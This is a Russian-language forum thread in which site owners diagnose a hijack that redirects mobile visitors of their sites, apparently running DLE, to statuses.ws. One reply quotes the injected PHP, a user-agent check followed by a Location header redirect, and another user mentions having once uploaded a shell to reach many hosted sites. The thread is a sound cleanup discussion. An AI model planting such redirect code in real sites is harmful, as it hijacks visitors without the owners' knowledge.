Что нового

Не заходит на сайт с мобильного

• Автор темы Автор темы Alcides
  • Дата начала Дата начала
A

Alcides

Гость
Такая проблема есть сайт eminemc.ru с компьютера когда заходишь сайт работает, с телефона же, перенаправляет куда-то, что это может быть ? Заранее благодарен!

Может в шаблоне для мобильных устройств какой-то левый код есть?

Цитата: Alcidesчто это может быть ? редирект для мобильных устройств

Еще одна жертва данного редиректа, у самого тоже самое было. Посмотри внимательно файл index.php. У меня там был прописан редирект на сайт statuses.ws

Все убрал, но все равно проблема осталась, может еще в каком файле ?

Alcides,а просканировать файлы на содержание текста "statuses.ws", например Total Commander-ом, не?

Цитата: AlcidesДа я нашел а что там удалять ?Было у меня такое 9 января. Поковырялся - нашел в 6-ти файлах следующий код:$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");if ($iphone || $android || $palmpre || $ipod || $berry === true) {     header('Location: http://statuses.ws/');}Поудалял везде. На следующий день опять появился. После повторного удаления больше не было пока что.

Что то странно, что ДЛЕшники молчат, ведь явно где то у них дырка. Мой пока не тронули но боюсь то же не за горами взлом.

Воланд,Уверен? Может хост дырявый.Я залив 1 раз шелл получил доступ к очень большому кол-ву сайтов из-за кривого хостинга.

Цитата: ВоландЧто то странно, что ДЛЕшники молчат, ведь явно где то у них дырка.ни факт, возможно и через хостинг ломают

Такая же проблема была недавно, удалил эти коды и установил новые обновления, больше этого кода не было.

леший,WebSet,Не парни. Наблюдаю эту картину у совершенно разных людей из разных стран. Но все атакованные сайты именно на Дле, а началось все после НГ

Верх